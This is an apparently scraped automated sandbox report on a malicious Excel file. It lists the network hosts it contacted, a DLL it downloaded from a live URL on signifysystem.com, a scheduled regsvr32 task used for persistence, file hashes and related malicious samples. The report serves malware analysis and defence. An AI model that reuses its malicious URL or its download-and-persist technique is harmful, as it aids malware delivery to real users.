https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | | high
https://messaging.office.com/ | | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | | high
https://augloop.office.com/v2 | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | | high
https://skyapi.live.net/Activity/ | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/mac | | high
https://dataservice.o365filtering.com | URL Reputation: safe | unknown
                                                                                                                                            https://api.cortana.ai9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.39.58 | signifysystem.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
192.185.32.232 | fcventasyservicios.cl | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412182
Start date: 12.05.2021
Start time: 13:29:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 47s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 9659e9a8_by_Libranalysis.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLS@18/18@2/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 85.1% (good quality ratio 79.7%)
• Quality average: 81.4%
• Quality standard deviation: 28.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Report size exceeded maximum capacity and may have missing behavior information.
• TCP Packets have been reduced to 100

Simulations

Behavior and APIs

Time | Type | Description
13:32:54 | Task Scheduler | Run new task: frjwqvc path: regsvr32.exe s>-s "C:\Users\user\ritofm.cvm"

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
192.185.39.58 | 46747509_by_Libranalysis.xls | malicious
192.185.39.58 | 46747509_by_Libranalysis.xls | malicious
192.185.32.232 | 46747509_by_Libranalysis.xls | malicious
192.185.32.232 | 46747509_by_Libranalysis.xls | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
signifysystem.com | 46747509_by_Libranalysis.xls | malicious | 192.185.39.58
signifysystem.com | 46747509_by_Libranalysis.xls | malicious | 192.185.39.58
fcventasyservicios.cl | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232
fcventasyservicios.cl | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232

ASN

Match | Associated Sample Name / URL | Detection | Context
UNIFIEDLAYER-AS-1US | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232
UNIFIEDLAYER-AS-1US | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232
UNIFIEDLAYER-AS-1US | 457b22da_by_Libranalysis.exe | malicious | 192.232.222.43
UNIFIEDLAYER-AS-1US | abc8a77f_by_Libranalysis.xlsx | malicious | 67.20.76.71
UNIFIEDLAYER-AS-1US | Revised Invoice pdf.exe | malicious | 192.185.171.219
UNIFIEDLAYER-AS-1US | DINTEC HCU24021ED.exe | malicious | 162.241.169.22
UNIFIEDLAYER-AS-1US | dd9097e7_by_Libranalysis.exe | malicious | 192.185.171.219
UNIFIEDLAYER-AS-1US | RFQ.exe | malicious | 192.185.129.32
UNIFIEDLAYER-AS-1US | Order 122001-220 guanzo.exe | malicious | 162.241.62.63
UNIFIEDLAYER-AS-1US | in.exe | malicious | 162.241.244.112
UNIFIEDLAYER-AS-1US | PO-002755809-NO#PRT101 Order pdf.exe | malicious | 162.144.13.239
UNIFIEDLAYER-AS-1US | catalog-1908475637.xls | malicious | 108.167.180.164
UNIFIEDLAYER-AS-1US | catalog-1908475637.xls | malicious | 108.167.180.164
UNIFIEDLAYER-AS-1US | export of purchase order 7484876.xlsm | malicious | 108.179.232.90
UNIFIEDLAYER-AS-1US | XM7eDjwHqp.xlsm | malicious | 162.241.190.216
UNIFIEDLAYER-AS-1US | QTFsui5pLN.xlsm | malicious | 108.179.232.90
UNIFIEDLAYER-AS-1US | 15j1TCnOiA.xlsm | malicious | 192.185.115.105
UNIFIEDLAYER-AS-1US | e8eRhf3GM0.xlsm | malicious | 162.241.190.216
UNIFIEDLAYER-AS-1US | SOA PDF.exe | malicious | 192.185.226.148
UNIFIEDLAYER-AS-1US | djBLaxEojp.exe | malicious | 192.185.161.67

Match | Associated Sample Name / URL | Detection | Context
UNIFIEDLAYER-AS-1US | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232
UNIFIEDLAYER-AS-1US | 46747509_by_Libranalysis.xls | malicious | 192.185.32.232
UNIFIEDLAYER-AS-1US | 457b22da_by_Libranalysis.exe | malicious | 192.232.222.43
UNIFIEDLAYER-AS-1US | abc8a77f_by_Libranalysis.xlsx | malicious | 67.20.76.71
UNIFIEDLAYER-AS-1US | Revised Invoice pdf.exe | malicious | 192.185.171.219
UNIFIEDLAYER-AS-1US | DINTEC HCU24021ED.exe | malicious | 162.241.169.22
UNIFIEDLAYER-AS-1US | dd9097e7_by_Libranalysis.exe | malicious | 192.185.171.219
UNIFIEDLAYER-AS-1US | RFQ.exe | malicious | 192.185.129.32
UNIFIEDLAYER-AS-1US | Order 122001-220 guanzo.exe | malicious | 162.241.62.63
UNIFIEDLAYER-AS-1US | in.exe | malicious | 162.241.244.112
UNIFIEDLAYER-AS-1US | PO-002755809-NO#PRT101 Order pdf.exe | malicious | 162.144.13.239
UNIFIEDLAYER-AS-1US | catalog-1908475637.xls | malicious | 108.167.180.164
UNIFIEDLAYER-AS-1US | catalog-1908475637.xls | malicious | 108.167.180.164
UNIFIEDLAYER-AS-1US | export of purchase order 7484876.xlsm | malicious | 108.179.232.90
                                                                                                                                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.190.216
                                                                                                                                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 108.179.232.90
                                                                                                                                                          15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.115.105
                                                                                                                                                          e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.190.216
                                                                                                                                                          SOA PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.226.148
                                                                                                                                                          djBLaxEojp.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.161.67

JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_68e15ffc7f9f5ac199eaf956335a58761f4230_7a325c51_0f165c5f\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 11464
Entropy (8bit): 3.774649044476038
Encrypted: false
SSDEEP: 192:czcHHb6V6RiH/RS5uGXx3RjetB/u7svS274ItUz:ucH76VS6/RS5n3jez/u7svX4ItUz
MD5: 39C8BF52118F2DF4E1400A3D41DE5A51
SHA1: E62C4BC8AF8B8FCE9E049E142A203B9C4199E3BB
SHA-256: B515576750DBB9CFE3CC594AEEE3644FE7D1FB8C0BFCC8C11C7B0A592EF0A9C5
SHA-512: 699D4D43B3C0522510575F4426C6C6E664E657FAB82505CC9661A8F90B537B5741AC9D5057FE30B14F8CE3D33646C1A959E46196B4778575AC87165164188812
Malicious: false

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_68e15ffc7f9f5ac199eaf956335a58761f4230_7a325c51_169b688f\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 11468
Entropy (8bit): 3.7748207749167326
Encrypted: false
SSDEEP: 192:65zctb6VrRiH/RS5uGXx3RjetB/u7s+S274ItUA:6tcZ6Vl6/RS5n3jez/u7s+X4ItUA
MD5: 5847C220BB3FCE86D70761833080B730
SHA1: A4163C896D0E0757CCD535BAEBC12A2B86997D0D
SHA-256: D119B196266808913C896B2907FDFA19DD0B6BC191AEE69869A28F61CDB3346A
SHA-512: C29C5FE40E0C9135D04057D9D6EA232F05BDCD5A38C1D149EB4E74DF305127B0C70E73B2F5FA143A51F7C770C7D7BB2E1653A0A537F894F54F15A7FD3E9F9119
Malicious: false

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CBF.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Wed May 12 11:33:02 2021, 0x1205a4 type
Category: dropped
Size (bytes): 35442
Entropy (8bit): 2.5239486387082346
Encrypted: false
SSDEEP: 192:W4JnLfisbC1OUVml8P2tWD7ReNW+N8HLOglhLMEZmcv8hn39:pfisbkAAD7UHGJhLMdci39
MD5: DC850D1425AC809E1ACD975F4BAB694C
SHA1: B04B235D0D07FDC2E44307B53D9080695B62B3D7
SHA-256: BC6A8571B9AF3ECAEA069A8857280EC7BBB549A0ABF843E347EA048048BD98B3
SHA-512: F6BE9D6FD0B2422411A895BBFF14A1A32710D2FAA86C0B4FCB2C255B008964BA1D4397240ACB942F8F95CD87E131707D6D0ABE93B2A8FB7F27564FC30789EF41
Malicious: false

C:\ProgramData\Microsoft\Windows\WER\Temp\WER54FD.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8250
Entropy (8bit): 3.692711693602928
Encrypted: false
SSDEEP: 192:Rrl7r3GLNiiY6t6YEvSUlEgmfJdpSN+pBB89bHAsfrtm:RrlsNi96t6YESUmgmfJdpSlHTfM
MD5: D163A65497BA8EB6406341C11EE4B63D
SHA1: 1FA2D678B7948135F4C862A33F4E3D92C92804D2
SHA-256: 6F698E4440A6FBFB5847F7FD12D5311C6F379307F5B4313D492F9208DA172FB2
SHA-512: DCE1EE06BD8C5BEAD0865CB4F08E2684E23BC1AD8C574A058D32165FDAD54AE821F5F6262780D57F695CBC24666C9666CF6F92033130EEC17D1EEC6AB3798EC1
Malicious: false

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5565.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Wed May 12 11:34:10 2021, 0x1205a4 type
Category: dropped
Size (bytes): 42306
Entropy (8bit): 2.3453773527449613
Encrypted: false
SSDEEP: 192:lA5m/ZivMeOugvCm+CFPutUdCvQKkmXMsWOwP2f19fkELxMCnsG:lLQyx5sUgvQ4lA292EbsG
MD5: 7398A2F851BD34E393B519BF1E875277
SHA1: 5115EAD153C056703D6FC041D332D856FF3CAB2B
SHA-256: CCC5B089CBE993673B437B9CEE5BE4E4BCF8999F74F84A77ECE9EC01813517A5
SHA-512: D98FF340312BD064002C9C54F5ACE140647411D0A72825D17B9D0D3DA8A54B4B281C3BB9CFF6633DFE13EB3C7D44DF58C4467B7EF368DA24830C05F3672BCE6E
Malicious: false
                                                                                                                                                          Preview: MDMP....... .......2..`...................U...........B..............GenuineIntelW...........T...........)..`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER58B7.tmp.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4621
                                                                                                                                                          Entropy (8bit):4.449817238256939
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwSD8zsyJgtWI9fvWSC8Bm8fm8M4JkMGEF8wy+q8sSdMKJYbgd:uITfAk+SNVJYNqYbgd
                                                                                                                                                          MD5:A0F1A7247BFAC0C9B73858DC79665D7E
                                                                                                                                                          SHA1:19301FF2E82290A794A2469DEB078EC2C4FF2AAD
                                                                                                                                                          SHA-256:A8B9192922BEC62DEF51699075A59623E048621259670145027438E468A2D755
                                                                                                                                                          SHA-512:BC3B7755771F262EADA33BAB6A9589568752ABAC59B5D6FD5EB1929E7DEEEB9931CC08E57A6FFF1DB3D05E750732261E63652B7400D4AE5074C6DFAD13ADA39A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986203" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER611E.tmp.WERInternalMetadata.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8258
                                                                                                                                                          Entropy (8bit):3.690894055322852
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Rrl7r3GLNic+6IOEUe6YqMSURgmfJdpSN+pBB89bKesfh9mOm:RrlsNi16IOW6YRSURgmfJdpSlKdfh9m
                                                                                                                                                          MD5:9AEBAB314B2BD9AF417BC87D58172805
                                                                                                                                                          SHA1:5B4DE827B9E4EB11B844A1C938674B4C3DCBDF7D
                                                                                                                                                          SHA-256:BAF40699EC1503DC290CDCBC12CBC16E79BF643F16901820BD3391A0B62FDBC6
                                                                                                                                                          SHA-512:C3D8CC098D9B61ADF6D89E5B0F9CA41C236741B7449581288E6F2099C724B26CDE6B2EBE3E7D15B231D4E1B4A343FBA0729E8C4A050380E8883A66F348D630FC
                                                                                                                                                          Malicious:false
Preview (UTF-16 text, decoded): <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4780</Pid> ...
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER640D.tmp.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4621
                                                                                                                                                          Entropy (8bit):4.450060334493844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwSD8zszJgtWI9fvWSC8BP8fm8M4JkMGEF/Q+q8sSdUKJY5gd:uITfNk+SNGJAZqY5gd
                                                                                                                                                          MD5:BA42F4ED21FCF20EA61DE53019AFF2E6
                                                                                                                                                          SHA1:5F31D906B4D7898680740E47012E551444C41329
                                                                                                                                                          SHA-256:E8909D4B3BCEF7BB6D8526B105E79A8BC69CFF24755013DAA5091CB5A24CB7BF
                                                                                                                                                          SHA-512:820EEABF7A4172B5A0D469F7D5C38FF6F77AC283469EC5D294432C78BD50FC22860F2FB97D8E3A0E824C3B57259FF39BB8D8F7E1313E44415EF781696638ED15
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986204" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9B0D8C85-82C2-4C91-AEDC-B9459681EEEA
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):134558
                                                                                                                                                          Entropy (8bit):5.36837155136519
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:IcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:vEQ9DQW+zPXO8
                                                                                                                                                          MD5:421B3B97C4DD0FB55E325A1D2AE0D0C8
                                                                                                                                                          SHA1:52C5DC8226280C0F3A5E9A7005B20768E0CF4250
                                                                                                                                                          SHA-256:44A5C380DB28AF6E10E6037428D4E955FD1324511F0E03656134371F86DC9DDB
                                                                                                                                                          SHA-512:EF9CC8A5F9C09FF5C23FEE36F40DBE56241ACC2E90CFED934A04D775281EFBF61133E62C7E805777964C634219A7758A2F190B63CD3772962BCBF6B08A40ED02
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T11:32:25">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):395500
                                                                                                                                                          Entropy (8bit):6.001802978220178
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:AJh65mtNNZQJjumcc/9zZppSFR1qY2/N33i7eVZ5qP3Ca6xzDthbrath0PIk:AJBNNcjuQ/9zoaV3EeVHq/Ca6Vbrdg
                                                                                                                                                          MD5:79E922F1BC80F1C6D9F7273DD2CC67A7
                                                                                                                                                          SHA1:31502F7EFDE63CD3FAE8C1258458CC9070A51749
                                                                                                                                                          SHA-256:25C075C6919DFB86DF81D3E868D1420D88522746ACA34946E864145AD588E5E0
                                                                                                                                                          SHA-512:3116A44D4287F3F585FEFB5D527460D33F0E724879129F6AF2822BD4B8170D7593982AB21575179E3B1480A286A0135BEB2BF7B2F6589E26C21D468BF97919A0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          IE Cache URL:https://signifysystem.com/ceg7AX7oN0o/ue.html
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..r..o!..o!..o!..|!..o!..}!..o!Rich..o!................PE..L....c.`...........!......... .......k......................................................................................0...........................................................................................0............................code............................... ..`.data............ ..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\E0C40000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):81548
                                                                                                                                                          Entropy (8bit):7.910222120901931
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:sjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJDt:g+nHSD8YZo/Uh0ZymYQ0y7FAL5t
                                                                                                                                                          MD5:3FAF6C9EC3CA97F2FDBB16AAF7F21538
                                                                                                                                                          SHA1:6EE949BBC6EEAA09970FA0F0712DC63B3ED3351E
                                                                                                                                                          SHA-256:69824A86AA6A1E806A3B6820C01045130690515875A7E23B4E3C5FE73C7C96A2
                                                                                                                                                          SHA-512:26D9E11FF580999CE2D40C4FED2477BD50A003B26E55BF0440C9CD45F867DD91BEE09F04663761FB4581B4DC6566BCED9FE02351A6A447BE6C53D6EA946B7D10
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9659e9a8_by_Libranalysis.LNK
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Wed May 12 10:32:29 2021, atime=Wed May 12 10:32:29 2021, length=177152, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2250
                                                                                                                                                          Entropy (8bit):4.705815148671922
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8Izi0Eoq2VOEEwcNaOExB6pIzi0Eoq2VOEEwcNaOExB6:82i0lqeFyNaFxK2i0lqeFyNaFx
                                                                                                                                                          MD5:6FA30B3E904D62A12E94BEE14F7A29A1
                                                                                                                                                          SHA1:66A94FD22924AE600B07172BCD57AA86E967E6BE
                                                                                                                                                          SHA-256:4B48D4C6FC7E4A305D4FDC86A3D220DC564E7F21E9B34D71C1CBA69D956CA4B0
                                                                                                                                                          SHA-512:B584A61F1ECFFE4D7BD8FFF85DD87790494A37B1069E1106C744383F832AEFCF944DD05072A9D8DC682D04C54A47A169BC318A91BEE54F14D4AACE139DED0BF3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: L..................F.... ...o..S......}"G....}"G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.\....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.\....#J....................PDK.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.\.....Y..............>.....d.'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.\ .9659E9~1.XLS..j......>Q{<.R.\.....V........................9.6.5.9.e.9.a.8._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\9659e9a8_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.6.5.9.e.9.a.8._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...L................!a..%.H.VZAj...L...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed May 12 10:32:29 2021, atime=Wed May 12 10:32:29 2021, length=8192, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):904
                                                                                                                                                          Entropy (8bit):4.669574121320632
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:8d1XUSduCH2KO0E4isQ9J+WrjAZ/DYbD0RSeuSeL44t2Y+xIBjKZm:8dBi0+P9vAZbcD037aB6m
                                                                                                                                                          MD5:B25CFCF82131C1477BE254A8197AC4D7
                                                                                                                                                          SHA1:C9F9DD0B2A241654D3CABF53181C9104F72A4F33
                                                                                                                                                          SHA-256:BA2619BEC415B0F8436042E36185BFCDA8A399E1ED772FDE3EFFE088561031B9
                                                                                                                                                          SHA-512:9154445B77F891BF81113FEB819F84040B5C60FF1C0AEC44E6B8AE33A1CBE945E81EE452666C022E2FC134CFFE8D2B9CF90835C66C56CF4C615DD6D1014FE591
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: L..................F.............-.....}"G..$U.}"G... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.\....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.\....#J....................PDK.j.o.n.e.s.....~.1......R.\..Desktop.h.......N...R.\.....Y..............>......XI.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
